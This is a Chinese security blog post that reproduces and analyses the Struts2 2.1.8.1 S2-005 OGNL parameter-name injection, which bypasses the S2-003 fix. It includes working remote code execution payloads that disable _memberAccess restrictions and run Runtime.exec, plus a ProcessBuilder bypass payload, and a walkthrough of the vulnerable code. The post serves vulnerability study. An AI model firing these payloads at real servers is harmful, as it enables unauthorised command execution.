『Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-005(S2-003修复绕过)复现与浅析

已于 2022-08-24 15:07:29 修改
阅读量1k 收藏
点赞数
分类专栏: # Struts 2 文章标签: java struts web安全 ognl s2-005
于 2022-08-24 09:47:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/126490087
版权

文章目录

漏洞简介

S2-005是S2-003的绕过,xwork更新到2.1.6版本;005新增了SecurityMamberAccess功能,但是可以被绕过

影响范围

Struts 2.0.0 - 2.1.8.1

漏洞复现

环境配置

https://archive.apache.org/dist/struts/library/struts-2.1.8.1-lib.zip

保留以下jar包

在这里插入图片描述
写一个action

在这里插入图片描述
web.xml需要配置

    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>

环境起不来可以看之前我写的笔记

复现过程

向任意action发送请求payload即可

?("\u0023_memberAccess.allowStaticMethodAccess\u003dtrue")(aaa)(aaa)&("\u0023context['xwork.MethodAccessor.denyMethodExecution']\u003dfalse")(aaa)(aaa)&("\u0023_memberAccess.acceptProperties\u003d@java.util.Collections@EMPTY_SET")(aaa)(aaa)&("\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET")(aaa)(aaa)&("\u0023return\u003d@java.lang.Runtime@getRuntime().exec('calc')")(aaa)(aaa)

在这里插入图片描述

代码审计

新增参数的黑白名单

在这里插入图片描述
具体实现是向OgnlValueStack.securityMemberAccess操作:该对象有一个allowStaticMethodAccess参数,用于开启是否调用静态方法,默认不允许

允许根据一个成员是否是静态的来做出访问决定。也阻止或允许对属性的访问。

在这里插入图片描述
如果OgnlValueStack是root,该参数就会被传入context

在这里插入图片描述
这里调用Ognl.createDefaultContext()创建默认上下文,securityMemberAccess起了别名_memberAccess

在这里插入图片描述
之后调用Ognl.setMemberAccess()设置传入的_memberAccess,因此要有set方法
在这里插入图片描述
在这里插入图片描述
SecurityMemberAccess.isAccessible()用于判断是否允许方法被调用

在这里插入图片描述
isAcceptableProperty()判断黑白名单,要求在白名单且不在黑名单

在这里插入图片描述
但是只要黑白名单都为空就能返回false

在这里插入图片描述

流程

  • 开启_memberAccess.allowStaticMethodAccess
  • 关闭context[“xwork.MethodAccessor.denyMethodExecution”]
  • _memberAccess.acceptProperties和excludeProperties设置为空
  • 调用Runtime.exec()

在这里插入图片描述

开发者的疏忽——再次绕过:通杀利用

通过分析可以发现:该功能一直在防御静态方法调用,却忽略了动态的情况

因此只要new ProcessBuilder().start()完全可以绕过以上防御措施

?(\u0023context['xwork.MethodAccessor.denyMethodExecution']\u003dfalse)(aaa)(aaa)&(new java.lang.ProcessBuilder(new java.lang.String[]{'calc'}).start())(aaa)(aaa)

因此官方把S2-003和005的影响范围都定为了2.1.8.1,凭借此payload实现了通杀

修复

下一个版本2.2.1对传入参数进行白名单限制,缓解方法是添加拦截器

在这里插入图片描述
但是新版本仍然可以被绕过

参考

https://cwiki.apache.org/confluence/display/WW/S2-005
https://su18.org/post/struts2-1/#s2-005

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/126490087
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
murphysec的博客
06-04 4502
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞在Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
Apache Struts2远程代码执行漏洞(s2-005)两种方法复现
HEAVEN569的博客
02-14 1220
一、漏洞简述 漏洞原理: s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL
墨者学院-Apache Struts2远程代码执行漏洞(S2-005)复现
JimWu的博客
09-04 552
Apache Struts2远程代码执行漏洞(S2-005)复现 难易程度:★★ 题目类型:命令执行 使用工具:k8 漏洞原理:OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码或8进制即绕过安全限制。 1.打开靶场,了解s2-005漏洞原理 2.构造poc ?(‘u0023context[‘xwork.MethodAccesso...
0x23. Apache Struts2远程代码执行漏洞(S2-005)复现
qq_31679787的博客
10-17 769
通过构造poc测试漏洞; poc:%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29%3Dtrue&%28b%29%28%28%27\43context%5B\%27xwork.MethodAccessor.denyMethodExecution\%27%5D\75false%27%29%28b%29%29&%28...
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2739
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
S2-005命令执行漏洞复现
baidu_38844729的博客
11-06 942
使用docker环境复现 选择对应目录并编译启动环境 cd /vulhub-master/struts2/s2-005 docker-compose build docker-compose up -d 打开环境访问 http://10.10.10.148:8080/example/HelloWorld.action 10.10.10.148是测试机对应的地址 3.利用K8...
vulhub-struts2-S2-005 远程代码执行漏洞复现
qq_56426046的博客
06-19 466
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数解析为OGNL语句执行(可理解为java代码)。
Struts2 漏洞复现s2-005
weixin_51220765的博客
12-14 1536
Struts2 漏洞复现s2-005 原理: s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击
Java安全Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现浅析
Ho1aAs‘s Blog
08-29 925
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
struts2漏洞解决
11-16
解决Struts2存在的重大后门BUG,并附带详细介绍文档
struts-2.1.8.1-src.zip
11-14
Apache Struts Copyright 2000-2007 The Apache Software Foundation This product includes software developed by The Apache Software Foundation (http://www.apache.org/). Dojo (http://dojotoolkit.org/). ...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 ...
Struts2_s2-016&017&ognl2.6.11_patch漏洞补丁
07-25
-- 为修复struts2 s2-016、s2-017漏洞,重写DefaultActionMapper --> <bean type="org.apache.struts2.dispatcher.mapper.ActionMapper" name="myDefaultActionMapper" class=...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
mybatisPlus使用MetaObjectHandler对字段进行更新
m0_56356631的博客
04-23 752
都是符合我们的预期的。
java方法重写(重点讲),方法重载
最新发布
weixin_46281068的博客
04-27 828
一、方法重载定义:一个类中,出现多个方法的称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
string模拟实现
m0_73969414的博客
04-23 1744
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 1024
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值